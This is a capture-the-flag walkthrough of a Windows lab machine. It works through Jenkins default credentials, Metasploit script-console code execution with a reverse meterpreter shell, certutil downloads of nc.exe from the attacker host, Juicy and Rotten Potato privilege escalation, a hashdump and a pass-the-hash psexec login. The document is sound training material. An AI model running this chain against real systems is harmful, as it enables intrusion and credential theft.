NMAP ENUM
sudo nmap -O -A -p- 172.31.1.19
kali@kali:~/cyberseclabs$ nmap 172.31.1.19 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-25 10:33 EDT Nmap scan report for 172.31.1.19 Host is up (0.10s latency). Not shown: 990 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server 8080/tcp open http-proxy 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49163/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 20.86 seconds
We get a Jenkins login page lets try some default credentials the good old admin:admin…
Step 2: Exploitation
Browsing around the console and doing some clicking around, I have no idea what the hell I am looking for. I see a script console and this starts to stir up some evil thoughts on how I can exploit this thing. Did some googling and sure enough I found a Metasploit module that allows us to exploit this bad boy using Java code execution. This exploit can also be done manually without using Metasploit’s spoon feeding by throwing in commands to execute in the console.
Exploit: https://www.rapid7.com/db/modules/exploit/multi/http/jenkins_script_console
Let’s now fire up Metasploit from our terminal and use the exploit module following the commands in order:
msfconsole use exploit/multi/http/jenkins_script_console set RHOSTS 172.31.1.19 set RPORT 8080 set TARGETURI /script/ set USERNAME admin set PASSWORD admin
by default this module likes to use reverse_https payload for our reverse connection back. I switched to reverse_tcp for consistency.
set payload windows/meterpreter/reverse_tcp set LHOST <your ip> set LPORT 7777 run
Now it starts to exploit giving us back a meterpreter session. I typed the command shell for a detailed shell.
C:\Users\ben\Desktop>type access.txt type access.txt 11d92ba4a09c10adf0eb3636ad4c57e5 C:\Users\ben\Desktop>
Step 3: Post Exploitation
I ran to see if this thing was vulnerable to the Juicy Potato exploit
C:\Users\ben\Desktop>whoami /priv whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled C:\Users\ben\Desktop>
We can see that SeImpersonatePrivilege is Enabled. This means we can use the famous Juicy Potato attack.
I found a Juicy Potato exploit module for Metasploit. While still in the basic command shell, press Ctrl-Z to background the session. Hit Y if it asks you to background it.
We are now dropped back to the main Metasploit prompt, and we can verify any sessions we have running in the background with the sessions command:
We can now then load the Juicy Potato exploit module using the following commands:
use exploit/windows/local/ms16_075_reflection_juicy set SESSION 1 set LHOST <your ip> run
Sadly not working for me..
So We first transfer the juicy potato binary on our victim machine. You can get it from here. We also transfer nc.exe(Netcat for windows) to the victim machine.
c:\users\ben>certutil -urlcache -split -f http://10.10.1.1/nc.exe nc.exe
Juicy Potato also requires CLSID as an argument. You can find the list of CLSID for your OS version on the github repo of Juicy Potato. Using the ‘systeminfo’ command we can see that the machine is running Windows server 2012.
Next, we create a batch file, having the following contents.
This simply means that when rev.bat is run, it will connect to our local machine using nc.exe .
Now, we use juicy potato. But before that let’s set up a netcat listener on our local machine.
Running Juicy potato now,
Here,
- -p : Program to launch
- -t : Create Process call.
- -l : COM Server Listen Porn
- -c : CLSID as mentioned above. You can use any one from the list till it works.
Once this is completed, we get a shell back on our machine as NT Authority\system.
again not for me
c:\puck>juicy.exe -p c:\puck\rev.bat -t * -l 6666 -c {e60687f701a140aa-86ac-db1cbf673334} juicy.exe -p c:\puck\rev.bat -t * -l 6666 -c {e60687f701a140aa-86ac-db1cbf673334} Testing {e60687f701a140aa-86ac-db1cbf673334} 6666 COM -> recv failed with error: 10038
let’s go rotten
meterpreter > upload /tmp/rottenpotato.exe . [*] uploading : /tmp/rottenpotato.exe -> . [*] uploaded : /tmp/rottenpotato.exe -> .\rottenpotato.exe meterpreter > load incognito Loading extension incognito...Success. meterpreter > execute -Hc -f rottenpotato.exe Process 952 created. Channel 3 created. meterpreter > execute -Hc -f rottenpotato.exe Process 1952 created. Channel 4 created. meterpreter > impersonate_token "NT AUTHORITY\SYSTEM" [-] Warning: Not currently running as SYSTEM, not all tokens will be available Call rev2self if primary process token is SYSTEM [-] No delegation token available [+] Successfully impersonated user NT AUTHORITY\SYSTEM meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
c:\Users\Administrator\Desktop>dir Volume in drive C has no label. Volume Serial Number is 7863-44CF Directory of c:\Users\Administrator\Desktop 05/16/2020 01:26 PM <DIR> . 05/16/2020 01:26 PM <DIR> .. 05/19/2020 11:54 AM 32 system.txt 1 File(s) 32 bytes 2 Dir(s) 8,087,158,784 bytes free c:\Users\Administrator\Desktop> type system.txt 7b57e970b90d4244c5efa500b9dfe457 c:\Users\Administrator\Desktop>
c:\Users\Administrator\Desktop>^Z Background channel 5? [y/N] y meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c79999f468c6922c065724d95a18223::: ben:1009:aad3b435b51404eeaad3b435b51404ee:e549e5d2b2bf452ba959520eb82bdeeb::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: meterpreter >
kali@kali:~/cyberseclabs$ python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:1c79999f468c6922c065724d95a18223 ad ministrator@172.31.1.19 Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation [*] Requesting shares on 172.31.1.19..... [*] Found writable share ADMIN$ [*] Uploading file fJyPgVRp.exe [*] Opening SVCManager on 172.31.1.19..... [*] Creating service srVS on 172.31.1.19..... [*] Starting service srVS..... [!] Press help for extra shell commands Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Windows\system32>hostname &&whoami Potato nt authority\system C:\Windows\system32>
Author – Puckiestyle